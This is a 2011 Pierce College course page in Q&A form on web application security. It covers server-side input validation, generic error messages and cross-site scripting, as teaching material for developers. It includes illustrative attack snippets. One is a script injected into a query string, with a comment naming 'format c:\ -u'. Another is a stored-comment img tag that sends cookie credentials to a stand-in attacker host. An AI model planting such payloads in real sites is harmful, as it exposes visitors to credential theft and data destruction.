Clip Art Security
Pierce Home
Computer Science 555 Website Development using JavaScript and AJAX - 3 Units
Section:
3179
Instructor:
Brad Gilbert
Pierce Mailbox:
612
Email:
pierce@wavethunder.com
Wednesday Office Hours:
5:00 -   5:40 PM COSC 1507
Wednesday Lab:
5:45 -   7:50 PM COSC 1507
Wednesday Lecture:
7:55 - 10:00 PM MATH 1511
Other classes:
CS-575
security
Question:

What is security?

Answer:

Security ensures your website remains healthy and is not compromised by viruses & other illnesses, on both the web server and client browser.

Question:

How do I provide security?

Answer:

Always perform validation that input is what it should be,
and is not what it should not be.

Question:

What if my website offers no user input?

Answer:

Then you are safe, but keep in mind that query strings and AJAX
open the door to user input.

Question:

How do query strings open that door?

Answer:

Anytime your website inspects a query string as part of the URI, that may be tampered with by a visitor to your site, for example, consider the below URI: 

    http://mysite.com/mypictures.php?style=casual
    
    // a visitor could modify the URI:
    http://mysite.com/mypictures.php?<script>doSomethingBad...</script>
    
    // where doSomethingBad... may lead to executing a command such as:
    // format c:\ -u
Question:

How does AJAX open the door?

Answer:

AJAX provides a client-side means for delivering custom requests to the server. Consider the below client-side pseudo code: 

    get mypictures.xml
    
    // a visitor could modify that command:
    get <script>doSomethingBad...</script>
Question:

Does client-side validation provide security?

Answer:

Definitely not!
Client-side validation simply notifies a visitor that some input needs correcting, without having to make a round-trip to the web server and back - offering better performance.

As we have seen above, client-side data, (including validation), can be manipulated and/or bypassed.

Question:

What server-side validation should I perform?

Answer:

ALL input must be validated on the server!
Server-side validation includes, but is not limited to...

  • validate the size of input:
       is password length too short or too long?
  • validate data content:
       is numeric input indeed numeric?
  • validate message format:
       does query string contain exactly 2 field/value pairs?
  • validate field names:
       is "FirstName" indeed "FirstName"?

Question:

What error messages should the server return?

Answer:

Error messages should be generic and not specific. For example: 

    Invalid Signon.

instead of 

    The name is correct, but the password is too short.
Question:

OK, I understand how bad input sent to the server might might do bad things on the server, but how can that do bad things in my browser?

Answer:

Suppose your website is a Wiki about gold fish, and people visit your site to learn and post comments about gold fish. Suppose someone posts the following comment: 

    <img src="http://MyBad.com/MyBad.php?id=document.cookie.id&pw=docment.cookie.pw" />

All visitors to your site download that "comment" into their browser, and the browser dutifully sends their ID and password to some hacker in Florida!

Of course, you already know better than to store sensitive data in a cookie, right?
Note: document.cookie.id is pseudo code to demonstrate the conecpt.

Further reading:

Textbook Cover AJAX Security
by Billy Hoffman & Bryan Sullivan

Addison-Wesley Professional
Copyright: December 2007
ISBN: 0-321-49193-9


Brad Gilbert · Fall 2011
Computer Science · Pierce College · Woodland Hills CA · 818-719-6401